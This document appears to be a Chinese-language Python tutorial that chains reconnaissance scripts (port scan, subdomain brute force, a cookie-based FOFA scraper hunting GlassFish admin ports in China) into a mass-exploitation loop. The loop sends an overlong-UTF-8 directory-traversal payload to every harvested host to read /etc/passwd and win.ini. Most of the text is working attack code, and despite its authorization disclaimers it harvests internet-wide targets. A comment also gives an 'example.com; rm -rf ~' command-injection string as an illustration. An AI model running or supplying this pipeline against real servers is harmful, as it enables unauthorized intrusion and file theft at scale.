Python 信息搜集
信息搜集（以下脚本仅限在获得书面授权的目标上使用）
查询 IP（注意：getaddrinfo 返回的是地址信息元组列表，IP 在每个元组的 sockaddr[0] 中，不是单个 IP 字符串）:
# Resolve the target for the "http" service. getaddrinfo returns a list of
# (family, type, proto, canonname, sockaddr) tuples, so the actual address of
# each entry is sockaddr[0]; the name `ip` is kept for the snippets below.
ip = socket.getaddrinfo(host=url, port='http')
判断 CDN（粗略启发式：统计 nslookup 输出中 "." 的个数，解析出的地址越多越可能在 CDN 后面；结果仅供参考）:
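# CDN heuristic via the system resolver: run `nslookup <url>` and count the
# '.' characters in its output — many answers (several A records / a CNAME
# chain) is taken as a hint that a CDN fronts the host. Crude: a long hostname
# alone inflates the count, so treat `x` as a hint, not a verdict.
import subprocess

# Argument list with shell=False: `url` is attacker-influenced input (it comes
# from the target list), so it must never be spliced into a shell string the
# way os.popen("nslookup " + url) did — `example.com; rm -rf ~` would run.
cdn_data = subprocess.run(
    ["nslookup", url], capture_output=True, text=True, check=False
).stdout
x = cdn_data.count('.')  # number of dots in the resolver output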
端口扫描:
# 自写 socket TCP connect 扫描（下面的实现只有 TCP，没有 UDP）
# 可能出现判断有误：所有端口复用同一个 socket 对象（connect 过一次后不能再 connect），且没有设置超时，被防火墙丢包的端口会长时间阻塞
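# Ports probed when the caller does not pass a list (the original hard-coded set).
DEFAULT_PORTS = frozenset({
    20, 21, 22, 23, 25, 69, 79, 80, 88, 110, 113, 119, 220, 443, 456, 513, 544,
    548, 553, 555, 568, 569, 635, 636, 666, 993, 1001, 1011,
})


def port_scan(url, ports=None, *, timeout=1.0):
    """TCP connect scan of ``url``; print one ``<port> |open`` / ``<port> |close`` line per port.

    Args:
        url: hostname or IP address to scan.
        ports: iterable of TCP ports to probe; defaults to ``DEFAULT_PORTS``.
        timeout: per-port connect timeout in seconds. Without it a filtered
            (silently dropped) port blocks for the OS default, often minutes.

    Returns:
        dict mapping each probed port to ``True`` (connect succeeded) or ``False``.

    Note: ``connect_ex`` only distinguishes "connected" from "anything else",
    so refused, filtered and timed-out ports are all reported as ``close``.
    """
    if ports is None:
        ports = DEFAULT_PORTS
    results = {}
    for port in sorted(ports):
        # One fresh socket per probe. A socket that has completed (or failed) a
        # connect cannot be reused for another connect_ex — that is why the
        # original single-socket loop misreported every port after the first.
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as probe:
            probe.settimeout(timeout)
            is_open = probe.connect_ex((url, port)) == 0
        results[port] = is_open
        print(port, '|open' if is_open else '|close')
    return results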
查询子域名（字典爆破：dic.txt 每行一个前缀，拼成 前缀.域名 后尝试解析，能解析即视为存在；注意泛解析域名会让每个前缀都"命中"）
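def zym_check(url, wordlist='dic.txt', *, delay=0.1, resolve=None):
    """Brute-force subdomains of ``url`` from a wordlist and print the ones that resolve.

    Every non-empty line of ``wordlist`` is one candidate label; ``<label>.<url>``
    is resolved and, on success, printed as ``<fqdn> -><ip>``.

    Args:
        url: parent domain, e.g. ``example.com``.
        wordlist: path of the candidate file, one label per line (default ``dic.txt``).
        delay: seconds to sleep after each hit, to go easy on the resolver.
        resolve: optional ``name -> ip`` callable used instead of
            ``socket.gethostbyname`` (injection point for tests / custom resolvers).

    Returns:
        list of ``(fqdn, ip)`` tuples that resolved, in wordlist order.

    Caveat: a wildcard DNS zone resolves every label, so every candidate is
    reported; probe a random label first when the hit rate looks too good.
    """
    if resolve is None:
        resolve = socket.gethostbyname
    found = []
    # Context manager so the wordlist handle is closed even if resolution raises.
    with open(wordlist, encoding='utf-8', errors='ignore') as handle:
        for line in handle:
            zym = line.strip()
            if not zym:
                continue  # a blank line would otherwise query ".<url>"
            zym_url = zym + '.' + url
            try:
                ip = resolve(zym_url)
            except (OSError, UnicodeError):
                # NXDOMAIN / resolver failure (socket.gaierror is an OSError)
                # and over-long labels: no such host, move on. Anything else
                # is a real bug and should surface rather than be swallowed.
                continue
            print(zym_url + " ->" + ip)
            found.append((zym_url, ip))
            if delay:
                time.sleep(delay)
    return found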
fofa（走网页接口抓取搜索结果，需要登录态 Cookie；Cookie 是凭据，不要把真实值写进代码或提交到仓库，建议从环境变量读取）
import requests
import base64
from lxml import etree
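import os

fofa = 'https://fofa.info/result?qbase64='
# FOFA takes the query base64-encoded in the qbase64 parameter.
search = '"glassfish" && port="4848" && country="CN"'
# The web endpoint only answers to a logged-in session, so a Cookie header is
# required. It is read from the environment rather than hard-coded: a session
# cookie is a credential and must not live in (or be committed with) the script.
header = {
    'Cookie': os.environ.get('FOFA_COOKIE', 'cookies'),
}
search = str(base64.b64encode(search.encode('utf-8')), "utf-8")  # base64 the query
for page in range(1, 10):
    # Explicit timeout so an unresponsive endpoint cannot hang the loop forever.
    response = requests.get(fofa + search + '&page=' + str(page), headers=header, timeout=15)
    # An expired/invalid cookie yields an error page; fail loudly instead of
    # silently scraping zero results page after page.
    response.raise_for_status()
    soup = etree.HTML(response.content.decode('utf-8'))
    # Result links are the <a target="_blank"> anchors on the page. This is tied
    # to FOFA's current markup and will return nothing if the layout changes.
    ips = soup.xpath('//a[@target="_blank"]/@href')
    if not ips:
        continue  # don't append an empty line — the downstream reader has to skip it
    with open(r'ip.txt', 'a+') as f:
        # Append this page's results; the `with` block closes the file.
        f.write('\n'.join(ips) + '\n')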
读取文件并判断是否存在漏洞（GlassFish 的 /theme/META-INF/ 目录遍历：%c0%ae 是 "." 的超长 UTF-8 编码，逐级 "../" 绕过路径规范化后读取任意文件；上面 fofa 查询的 4848 端口一般是 GlassFish 管理控制台）
import requests
import urllib3
urllib3.disable_warnings()
import time
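# Content markers that only a genuine read of the target file produces. A bare
# HTTP 200 is not evidence: custom 404 pages, WAF block pages and login redirects
# all return 200 and would be written to vuln.txt as false positives.
_PASSWD_MARKER = 'root:'
_WININI_MARKER = '[extensions]'


def _fetch(target_url):
    """GET ``target_url`` with TLS verification off (scan targets rarely carry valid
    certificates); return the response, or None if the request itself failed
    (connection error, timeout, missing scheme in the href)."""
    try:
        return requests.get(target_url, verify=False, timeout=10)
    except requests.RequestException:
        return None


def _hit(response, marker):
    """True when ``response`` is a 200 whose body contains ``marker``."""
    return response is not None and response.status_code == 200 and marker in response.text


# %c0%ae is an overlong UTF-8 encoding of "."; each "%c0%ae%c0%ae/" is a "../"
# step that survives the server's path normalisation. Both payloads walk up the
# same depth and then down to a well-known file whose content we can recognise.
with open('ip.txt') as targets:
    for line in targets:
        ip = line.strip()
        if not ip:
            continue  # the original `ip.count()` raised TypeError here: str.count needs an argument
        payload_windows = ip + '/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini'
        payload_linux = ip + '/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd'
        # A network failure on one host must not abort the whole scan (the
        # original let the exception propagate out of the loop).
        resp_linux = _fetch(payload_linux)
        time.sleep(0.1)
        resp_windows = _fetch(payload_windows)
        time.sleep(0.1)
        if _hit(resp_linux, _PASSWD_MARKER) or _hit(resp_windows, _WININI_MARKER):
            print(ip)
            # Append per hit so partial results survive an interrupted run.
            with open(r'vuln.txt', 'a+') as f:
                f.write(ip + '\n')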
vuln.txt 中记录的是疑似存在漏洞的站点。仅凭 200 状态码容易误报（自定义 404 页、WAF 拦截页也会返回 200），需人工访问确认响应内容确实是 win.ini 的 [fonts]/[extensions] 段或 /etc/passwd 的 root: 行；且只能在获得授权的范围内进行验证。